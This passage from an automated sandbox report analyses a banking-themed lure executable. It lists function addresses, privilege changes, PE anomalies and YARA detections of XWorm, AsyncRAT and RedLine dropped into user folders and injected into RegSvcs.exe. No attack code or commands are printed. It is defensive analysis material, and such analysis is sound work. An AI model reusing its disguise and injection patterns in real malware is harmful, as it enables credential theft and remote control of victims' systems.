Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71360	0_2_00D71360
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE39A3	3_2_00AE39A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD5980	3_2_00AD5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA6EAF	3_2_00AA6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA51EE	3_2_00AA51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADD580	3_2_00ADD580
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA7F80	3_2_00AA7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD3780	3_2_00AD3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADC7F0	3_2_00ADC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA410	3_2_00CEA410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02860FE0	9_2_02860FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02861030	9_2_02861030
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_017DDC74	10_2_017DDC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057EEE58	10_2_057EEE58
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8850	10_2_057E8850
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0040	10_2_057E0040
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E0007	10_2_057E0007
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057E8840	10_2_057E8840
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099CA20	12_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_0099AA63	12_2_0099AA63
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00998789	12_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BA810	12_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009979F0	12_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B92A0	12_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009B93B0	12_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_00997C00	12_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009C2D40	12_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009BEEB0	12_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD7C00	13_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFA810	13_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD79F0	13_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00D02D40	13_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF92A0	13_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CFEEB0	13_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CF93B0	13_2_00CF93B0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC668	17_2_00AFC668
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_0340515C	17_2_0340515C
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C6EAF	17_2_033C6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F5980	17_2_033F5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C51EE	17_2_033C51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_034039A3	17_2_034039A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C7F80	17_2_033C7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033F3780	17_2_033F3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FC7F0	17_2_033FC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FD580	17_2_033FD580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1385	19_2_02CC1385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1315	19_2_02CC1315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1335	19_2_02CC1335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1021	19_2_02CC1021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1030	19_2_02CC1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305E8	19_2_05A305E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305F8	19_2_05A305F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFC3C8130E9	21_2_00007FFC3C8130E9

Enables driver privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Enables security privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00420AE3 appears 70 times

PE file contains executable resources (Code or Archives)

Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe.2.dr	Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

PE file contains more sections than normal

Source: notification_helper.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: msedgewebview2.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: identity_helper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrmstp.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: notification_click_helper.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe0.2.dr	Static PE information: Number of sections : 13 > 10
Source: firefox.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: os_update_handler.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.2.dr	Static PE information: Number of sections : 12 > 10

Sample file is different than original file name gathered from version info

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257862399.0000000003F40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253495338.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Uses 32bit PE files

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Yara signature match

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
